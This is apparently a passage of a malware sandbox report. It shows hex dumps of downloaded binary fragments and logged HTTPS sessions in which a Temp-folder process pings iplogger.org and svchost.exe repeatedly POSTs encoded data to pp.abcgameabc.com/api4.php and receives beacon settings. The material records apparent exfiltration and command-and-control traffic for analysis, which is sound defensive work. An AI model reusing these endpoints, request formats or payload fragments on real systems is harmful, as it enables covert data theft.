                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15912INData Raw: ff 80 fa c8 44 3b e1 4c 03 cf e9 38 e4 f8 ff 40 c0 c6 a3 0f c1 f6 44 31 04 24 0f bd f1 5e f7 c7 7f 2b 6f 51 f5 66 41 3b ed 4d 63 c0 f8 4d 03 c8 e9 81 53 fa ff 41 ff e1 41 0f c8 e9 79 b3 fe ff ff c0 f5 f7 d8 f7 d0 35 29 56 2e 23 f9 e9 ba cb ed ff f7 d7 e9 35 bb ed ff 40 3a f1 4d 03 c1 e9 c7 24 f0 ff 56 c3 41 53 c3 ff ca f8 0f ca f8 c1 ca 02 e9 99 a7 f9 ff ff c0 d1 c8 41 f7 c1 8a 40 2a 07 05 44 40 46 10 41 80 fa 3d f9 66 41 f7 c0 b4 71 f7 d0 f8 57 f8 c1 df 15 31 04 24 40 80 d7 64 5f f8 48 63 c0 4c 03 d8 e9 f0 42 f3 ff 8b 74 25 00 e9 17 47 fc ff f7 d2 e9 d7 3a fb ff 4d 03 c1 e9 d7 e5 f7 ff 41 f7 d8 41 81 f0 ee 31 f2 7f f9 f5 41 51 49 0f ba f1 5f 49 0f c9 44 31 04 24 41 59 49 81 ff ea 6e 6f 0f 4d 63 c0 48 85 e5 3a f5 f8 49 03 f0 e9 93 6f fb ff 41 d1 c3 41 81
                                                                                                                                                                                                                                    Data Ascii: D;L8@D1$^+oQfA;McMSAAy5)V.#5@:M$VASA@*D@FA=fAqW1$@d_HcLBt%G:MAA1AQI_ID1$AYInoMcH:IoAA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15928INData Raw: 41 81 fb e2 3e 35 a7 19 f9 66 e9 37 62 fd ff 66 41 89 6b 08 40 0f 97 c5 9c 3b dc 41 8f 03 49 81 ea 04 00 00 00 40 c0 e5 dd 48 0f ac cd 1e 0f bf ee 41 8b 2a e9 bf 93 ef ff e9 01 60 f5 ff ff ca f8 49 85 d4 81 f2 bf 30 15 3f e9 9d 12 ed ff e9 25 d3 fe ff 49 f7 d2 9c 4c 8b d3 41 c1 d2 fb 8f 07 44 8b 16 48 81 c6 04 00 00 00 f9 45 33 d3 41 f7 da 41 0f ca f8 e9 b2 74 f0 ff ff c9 f8 f5 f7 d1 49 81 fa 57 27 68 39 41 51 49 0f a4 c1 50 31 0c 24 45 33 c9 4c 0f bf ca 41 59 81 fc fb 27 85 14 48 63 c9 e9 a0 0f ed ff 4d 8b 11 0c 71 41 8a 41 08 f6 d9 41 22 c9 49 81 c1 0a 00 00 00 41 88 02 66 d3 c9 66 0f bc cc c0 d9 f1 48 81 ed 04 00 00 00 8b 4c 25 00 f9 33 cf 41 f7 c1 70 69 13 15 41 84 fb f7 d9 f7 d1 0f c9 40 80 fd 47 81 f1 6b 77 a6 5d e9 8c dd f9 ff 40 8a fa 66 45 89 42
                                                                                                                                                                                                                                    Data Ascii: A>5f7bfAk@;AI@HA*`I0?%ILADHE3AAtIW'h9AQIP1$E3LAY'HcMqAAA"IAffHL%3ApiA@Gkw]@fEB
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15944INData Raw: 00 ec ef 01 00 09 f0 01 00 04 fd 10 00 0c f0 01 00 8e f1 01 00 0c fd 10 00 90 f1 01 00 b3 f1 01 00 d8 ca 10 00 2c f2 01 00 ff f6 01 00 d0 e4 10 00 d0 f7 01 00 51 f8 01 00 28 fd 10 00 54 f8 01 00 b1 f8 01 00 30 fd 10 00 e0 f9 01 00 7f fe 01 00 3c fd 10 00 80 fe 01 00 52 00 02 00 50 fd 10 00 54 00 02 00 5f 01 02 00 a8 f8 10 00 60 01 02 00 a1 02 02 00 14 e6 10 00 a4 02 02 00 c6 02 02 00 f4 ca 10 00 c8 02 02 00 45 03 02 00 6c fd 10 00 80 03 02 00 3c 05 02 00 30 f6 10 00 3c 05 02 00 aa 05 02 00 d8 ca 10 00 ac 05 02 00 5e 06 02 00 e0 ca 10 00 e0 06 02 00 97 07 02 00 14 e6 10 00 e0 08 02 00 38 09 02 00 80 e2 10 00 9c 09 02 00 9d 0a 02 00 80 e2 10 00 a0 0a 02 00 38 0b 02 00 e0 ca 10 00 38 0b 02 00 88 0c 02 00 74 fd 10 00 88 0c 02 00 47 0d 02 00 d0 e4 10 00 48 0d
                                                                                                                                                                                                                                    Data Ascii: ,Q(T0<RPT_`El<0<^888tGH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15960INData Raw: 00 5c 28 09 00 a0 40 11 00 60 28 09 00 30 2a 09 00 48 40 11 00 30 2a 09 00 d9 2c 09 00 f8 40 11 00 e0 2c 09 00 be 2e 09 00 e0 01 11 00 c0 2e 09 00 1f 31 09 00 e0 01 11 00 20 31 09 00 04 33 09 00 e0 01 11 00 10 33 09 00 49 35 09 00 a8 41 11 00 50 35 09 00 71 35 09 00 d8 ca 10 00 80 35 09 00 63 36 09 00 7c 41 11 00 70 36 09 00 0f 37 09 00 80 e2 10 00 10 37 09 00 06 38 09 00 80 e2 10 00 10 38 09 00 88 38 09 00 e0 ca 10 00 90 38 09 00 d2 38 09 00 60 44 11 00 e0 38 09 00 4d 39 09 00 7c 44 11 00 50 39 09 00 63 39 09 00 f4 ca 10 00 70 39 09 00 b0 3a 09 00 a0 44 11 00 b0 3a 09 00 4c 3b 09 00 18 43 11 00 50 3b 09 00 7f 3b 09 00 d8 44 11 00 80 3b 09 00 38 63 09 00 90 45 11 00 40 63 09 00 bc 63 09 00 e8 44 11 00 c0 63 09 00 f1 65 09 00 f4 44 11 00 00 66 09 00 74 6f
                                                                                                                                                                                                                                    Data Ascii: \(@`(0*H@0*,@,..1 133I5AP5q55c6|Ap67788888`D8M9|DP9c9p9:D:L;CP;;D;8cE@ccDceDfto


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    10192.168.11.2049858148.251.234.83443C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16565OUTGET /1nRWH4 HTTP/1.1
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                                                                                                                                                                    Host: iplogger.org
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:28 GMT
                                                                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: clhf03028ja=102.129.143.18; expires=Wed, 04-Oct-2023 05:10:28 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                    Set-Cookie: 388156471719766802=3; expires=Wed, 04-Oct-2023 05:10:28 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                                                                                                                                    Expires: Tue, 04 Oct 2022 05:10:28 +0000
                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    2022-10-04 05:10:28 UTC16566INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    11192.168.11.2049865104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:56 UTC16566OUTPOST /api4.php HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: pp.abcgameabc.com
                                                                                                                                                                                                                                    Content-Length: 282
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:10:56 UTC16566OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 53 70 31 4e 53 6f 6f 4b 53 6d 65 57 56 72 59 6d 69 57 6e 35 6c 6c 65 48 75 6d 33 71 53 6d 6d 59 79 6d 6f 4b 53 6d 65 47 64 6f 5a 36 62 65 70 4a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 6d 35 71 31 74 61 61 67 70 4b 5a 70 61 47 64 6f 65 36 62 65 70 4e 65 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 31 39 54 57 6f 74 66 57 33 36 4c 58 71 4b 6d 69 31 39 79 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 32 74 31 4b 6e 55 33 36 32 71 33 4e 61 47 71 74 7a 58 72 61 33 57 71 70 75 74 72 5a 71 6f 68 71 72 63 31 71 69 48 71 4b 32 61 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 36 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6e 61 61 67 70 4b 5a 6f 6e
                                                                                                                                                                                                                                    Data Ascii: p=kaZ5bGdiYntgb3im3qSp1NSooKSmeWVrYmiWn5lleHum3qSmmYymoKSmeGdoZ6bepJGmhpZlbWl7lqbepKaZm5q1taagpKZpaGdoe6bepNeToKSmb5Sm3qSm19TWotfW36LXqKmi19ymoKSmY2d5bG9ie294pt6kpq2t1KnU362q3NaGqtzXra3WqputrZqohqrc1qiHqK2apqCkpmNqe5am3qSm36LfpqCkppZ7fW9lYqbepKa@naagpKZon
                                                                                                                                                                                                                                    2022-10-04 05:10:57 UTC16567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:57 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BhAlDYgO%2BwM6A4sMv0Zdy7PYe%2Bp9e0rkOra3u%2BNg79uQylTCvNeJrLzwOtuRBROel%2B4VK%2FZIogmH3JWN29Wu%2FJWgxO8u5GpSpa4uLf2oEQNd2TOkRo3UfPSHH1v9yBI1OeOLow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b69fe18ba6909-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:10:57 UTC16567INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                                                                                                                                                                    2022-10-04 05:10:57 UTC16567INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    12192.168.11.2049866104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:57 UTC16567OUTPOST /api4.php HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: pp.abcgameabc.com
                                                                                                                                                                                                                                    Content-Length: 282
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:10:57 UTC16568OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 53 70 31 4e 53 6f 6f 4b 53 6d 65 57 56 72 59 6d 69 57 6e 35 6c 6c 65 48 75 6d 33 71 53 6d 6d 59 79 6d 6f 4b 53 6d 65 47 64 6f 5a 36 62 65 70 4a 47 6d 68 70 5a 6c 62 57 6c 37 6c 71 62 65 70 4b 61 5a 6d 35 71 31 74 61 61 67 70 4b 5a 70 61 47 64 6f 65 36 62 65 70 4e 65 54 6f 4b 53 6d 62 35 53 6d 33 71 53 6d 31 39 54 57 6f 74 66 57 33 36 4c 58 71 4b 6d 69 31 39 79 6d 6f 4b 53 6d 59 32 64 35 62 47 39 69 65 32 39 34 70 74 36 6b 70 71 32 74 31 4b 6e 55 33 36 32 71 33 4e 61 47 71 74 7a 58 72 61 33 57 71 70 75 74 72 5a 71 6f 68 71 72 63 31 71 69 48 71 4b 32 61 70 71 43 6b 70 6d 4e 71 65 35 61 6d 33 71 53 6d 33 36 4c 66 70 71 43 6b 70 70 5a 37 66 57 39 6c 59 71 62 65 70 4b 61 40 6e 61 61 67 70 4b 5a 6f 6e
                                                                                                                                                                                                                                    Data Ascii: p=kaZ5bGdiYntgb3im3qSp1NSooKSmeWVrYmiWn5lleHum3qSmmYymoKSmeGdoZ6bepJGmhpZlbWl7lqbepKaZm5q1taagpKZpaGdoe6bepNeToKSmb5Sm3qSm19TWotfW36LXqKmi19ymoKSmY2d5bG9ie294pt6kpq2t1KnU362q3NaGqtzXra3WqputrZqohqrc1qiHqK2apqCkpmNqe5am3qSm36LfpqCkppZ7fW9lYqbepKa@naagpKZon
                                                                                                                                                                                                                                    2022-10-04 05:10:58 UTC16568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:58 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FxDlZR8gIQYmOFVOuRsI2oF2%2BljH7iNA3vn2eDhjy2zLpt7SfO1rTdv32QRIgF8a6zPhKcj3%2BZd2lxic%2BjAYfRvkN6%2BjmHvfQdiQipnjoGn2LI4A6b5kE3QwZVrwKRzHiooAUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a01f834bb5f-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:10:58 UTC16569INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                                                                                                                                                                    2022-10-04 05:10:58 UTC16569INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    13192.168.11.2049867104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:10:59 UTC16569OUTPOST /api4.php HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: pp.abcgameabc.com
                                                                                                                                                                                                                                    Content-Length: 17962
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:10:59 UTC16569OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 53 70 31 4e 53 6f 6f 4b 53 6d 65 57 56 72 59 6d 69 57 6e 35 6c 6c 65 48 75 6d 33 71 53 6d 6d 59 79 6d 6f 4b 53 6d 65 47 64 6f 5a 36 62 65 70 4c 47 52 70 6f 61 57 5a 57 31 70 65 35 61 6d 33 71 53 6d 6d 57 79 57 5a 57 4e 37 70 71 43 6b 70 70 6c 6c 5a 57 46 76 65 32 6d 6d 33 71 53 6d 68 5a 52 6f 5a 32 4a 6c 59 70 6c 73 5a 57 39 35 65 39 50 58 30 61 52 36 65 33 68 70 74 5a 53 57 62 32 70 6e 65 5a 40 31 65 57 56 69 61 58 74 69 61 4e 4f 52 73 4b 5a 73 5a 32 6d 4c 61 58 75 57 74 4a 5a 6c 61 6d 39 34 65 33 69 5a 5a 57 4a 70 65 32 4a 6f 73 4b 62 65 61 4a 5a 72 65 36 43 77 70 6d 74 70 65 35 61 4d 5a 32 6d 5a 61 32 6c 6f 5a 57 4f 5a 5a 57 4a 70 65 32 4a 6f 73 4b 62 65 65 6d 64 67 61 58 75 54 30 61 52 70 74
                                                                                                                                                                                                                                    Data Ascii: p=kaZ5bGdiYntgb3im3qSp1NSooKSmeWVrYmiWn5lleHum3qSmmYymoKSmeGdoZ6bepLGRpoaWZW1pe5am3qSmmWyWZWN7pqCkppllZWFve2mm3qSmhZRoZ2JlYplsZW95e9PX0aR6e3hptZSWb2pneZ@1eWViaXtiaNORsKZsZ2mLaXuWtJZlam94e3iZZWJpe2JosKbeaJZre6Cwpmtpe5aMZ2mZa2loZWOZZWJpe2JosKbeemdgaXuT0aRpt
                                                                                                                                                                                                                                    2022-10-04 05:10:59 UTC16585OUTData Raw: 59 71 59 5a 62 62 57 74 4a 36 4b 67 34 44 57 31 4c 36 65 6e 4a 53 61 62 57 75 4f 74 35 64 74 59 6e 75 5a 71 32 79 50 31 4a 40 4e 65 47 32 63 69 5a 6c 69 69 4a 78 67 76 72 53 32 6a 59 48 66 6d 4e 53 58 31 6f 61 64 67 49 74 39 67 70 52 39 67 4b 31 67 71 36 68 37 71 57 4f 38 62 64 79 43 31 4a 64 73 6e 39 61 5a 71 6f 50 57 69 34 64 6e 33 35 79 4c 71 5a 65 62 59 71 71 6a 69 32 32 72 59 48 75 4f 6d 64 39 72 61 6d 32 6f 68 6f 46 36 74 35 78 75 74 4e 61 47 65 34 5a 71 69 37 39 6d 69 4b 70 39 59 72 52 74 61 32 79 55 74 35 74 69 59 49 71 38 6a 32 70 34 74 36 4f 32 62 34 68 74 65 5a 35 71 33 49 42 36 6c 49 42 36 69 47 40 38 6c 6d 32 43 69 4a 36 4d 6d 48 6c 68 6d 36 71 42 6e 61 6d 50 6c 33 69 6a 5a 57 6d 4f 6c 34 64 6f 59 62 57 24 69 4c 36 42 74 34 4f 4c 61 32 4f 74
                                                                                                                                                                                                                                    Data Ascii: YqYZbbWtJ6Kg4DW1L6enJSabWuOt5dtYnuZq2yP1J@NeG2ciZliiJxgvrS2jYHfmNSX1oadgIt9gpR9gK1gq6h7qWO8bdyC1Jdsn9aZqoPWi4dn35yLqZebYqqji22rYHuOmd9ram2ohoF6t5xutNaGe4Zqi79miKp9YrRta2yUt5tiYIq8j2p4t6O2b4hteZ5q3IB6lIB6iG@8lm2CiJ6MmHlhm6qBnamPl3ijZWmOl4doYbW$iL6Bt4OLa2Ot
                                                                                                                                                                                                                                    2022-10-04 05:10:59 UTC16587INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:10:59 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=akiY12QvPDeS6c%2BKMv78HYTVdHtAruv4YURJj3NOJXUVPxQ%2FYNheaJixBBbrgWQaz87BgYEXThr5qweFH9JUkUmh1tnEwAxYZ0nXWcfaJs5Z7GA0%2BOQvL%2FqV%2FzQ8H9FxvA0HqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a0ddf02bbb5-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:10:59 UTC16587INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                                                                                                                                                                    2022-10-04 05:10:59 UTC16587INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    14192.168.11.2049868104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16587OUTPOST /api4.php HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: pp.abcgameabc.com
                                                                                                                                                                                                                                    Content-Length: 2746
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16588OUTData Raw: 70 3d 6b 61 5a 35 62 47 64 69 59 6e 74 67 62 33 69 6d 33 71 53 70 31 4e 53 6f 6f 4b 53 6d 65 57 56 72 59 6d 69 57 6e 35 6c 6c 65 48 75 6d 33 71 53 6d 6d 59 79 6d 6f 4b 53 6d 65 47 64 6f 5a 36 62 65 70 4c 47 52 70 6f 61 57 5a 57 31 70 65 35 61 6d 33 71 53 6d 6d 33 68 39 65 36 61 67 70 4b 61 5a 5a 57 56 68 62 33 74 70 70 74 36 6b 70 6f 65 43 68 59 4c 54 68 39 4f 59 6d 71 6a 58 71 4e 61 74 6d 61 32 59 68 39 79 6f 6d 4e 79 74 31 39 54 55 33 4b 32 47 71 35 75 61 6d 70 71 61 6d 70 71 61 6d 74 47 6b 67 34 75 50 6d 4e 50 57 6d 64 24 55 31 74 53 5a 6d 70 69 5a 31 4a 6d 71 6d 35 6d 70 31 4a 6e 58 6d 36 6e 55 72 61 75 59 6d 4b 32 6f 71 70 71 74 71 39 47 6b 69 62 61 5a 6a 4a 6a 54 68 35 72 54 67 6f 57 61 68 62 61 44 30 61 53 4a 74 70 6d 4d 6a 4c 53 64 69 34 6d 32 30
                                                                                                                                                                                                                                    Data Ascii: p=kaZ5bGdiYntgb3im3qSp1NSooKSmeWVrYmiWn5lleHum3qSmmYymoKSmeGdoZ6bepLGRpoaWZW1pe5am3qSmm3h9e6agpKaZZWVhb3tppt6kpoeChYLTh9OYmqjXqNatma2Yh9yomNyt19TU3K2Gq5uampqampqamtGkg4uPmNPWmd$U1tSZmpiZ1Jmqm5mp1JnXm6nUrauYmK2oqpqtq9GkibaZjJjTh5rTgoWahbaD0aSJtpmMjLSdi4m20
                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16590INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Tue, 04 Oct 2022 05:11:00 GMT
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XIPhCNNm2wIxFN0vqBbJxhwEhyV4Q3aZucYSvQtqN3SorvTQdR%2FplDcEjxzpuArEpijvhw%2Fs3vzFz8Wyihic5TZdSlskc897KD45liu4kOsp4aJhHyqiPLDNpdGv6kl7x%2FOSNQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 754b6a11bcacbbd4-FRA
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16591INData Raw: 33 62 0d 0a 7b 22 68 6f 73 74 22 3a 5b 5d 2c 22 73 70 61 63 69 6e 67 22 3a 31 38 30 30 2c 22 73 70 61 63 69 6e 67 32 22 3a 31 32 30 2c 22 64 61 74 61 22 3a 7b 22 63 6f 64 65 22 3a 31 7d 7d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 3b{"host":[],"spacing":1800,"spacing2":120,"data":{"code":1}}
                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16591INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                    15192.168.11.2049869104.21.34.132443C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                    2022-10-04 05:11:00 UTC16591OUTPOST /api4.php HTTP/1.1
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Host: pp.abcgameabc.com
                                                                                                                                                                                                                                    Content-Length: 254
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
